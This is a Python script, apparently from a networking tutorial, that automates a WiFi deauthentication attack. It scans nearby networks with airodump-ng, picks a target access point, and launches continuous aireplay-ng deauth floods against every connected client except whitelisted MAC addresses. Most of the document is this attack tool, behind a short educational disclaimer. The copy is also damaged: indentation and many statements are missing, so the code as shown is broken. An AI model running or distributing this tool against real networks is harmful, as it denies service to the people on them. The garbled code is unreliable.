#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
elif row["BSSID"] == "Station MAC":
elif check_for_essid(row["ESSID"], active_wireless_networks):
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
# We make the script sleep for 1 second before loading the updated list.
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
ARGUMENTS: wifi interface name
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
# In Sudo Mode?
# Move any csv files to current working directory/backup
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
if network_controllers[int(controller_choice)]:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
# Monitor the selected wifi band(s).
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
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